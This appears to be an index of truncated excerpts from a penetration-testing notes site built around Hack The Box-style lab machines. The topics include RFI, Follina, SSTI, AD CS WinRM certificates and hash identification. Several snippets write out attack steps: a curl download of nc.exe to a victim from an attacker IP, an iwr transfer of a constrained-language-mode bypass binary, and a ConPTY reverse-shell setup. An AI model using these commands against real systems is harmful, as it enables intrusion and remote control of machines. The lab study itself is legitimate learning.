RFI Remote File Inclusion bypassing .htaccess If by any chance you are able to upload a file remotely within a server but you can’t see the content due to a php restriction: Try by using another ...

Host: 10.10.11.175 If Active Directory => Synchronize your NTP with the domain controller: nptdate 10.10.11.175 Content SMB Enumeration Follina Exploitation Reverse Shell with Invoke-P...

C# Compilation Project If we get a C# project not compiled, for example SharpWSUS we can compile it with Visual Studio on a Windows machine, follow this steps: Download the project onto your mach...

ConPTY 1) Download the Invoke-ConPTYShell.ps1 script in our local machine. 2) Modify the final line on the script as follows exchange the IP and remote Port of our local machine as well as the stt...

Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circ...

Host entries 10.10.10.203 N/A If Active Directory => Synchronize your NTP with the domain controller: nptdate 10.10.10.103 Content SVN - Subversion Enumeration Information Leakage VHos...

WINRM Certificate We can authenticate via WINRM by creating a certificate, this is an AD CS feature. As we can check on this notes all we need to do is follow this steps: Pre-requisites: Access...

Upload Netcat execution for windows. From victim machine: curl http://10.10.16.4/nc.exe -o nc.exe Examples: [[StreamIO#^40a776]] Network File System through SMB First create with impacket the se...

iwr (Invoke-Web-Request) Transfer a file with the following command: PS> iwr -uri http://10.10.14.4/PsBypassCLM.exe -OutFile PsBypassCLM.exe Execute this commands to create wget.ps1 on victim m...

Identify the hash type If you want to know the type of a password’s hash you can run the following command on your machine: hashcat.exe -j -m hash.txt And it will throw the type: Hash-mode was not...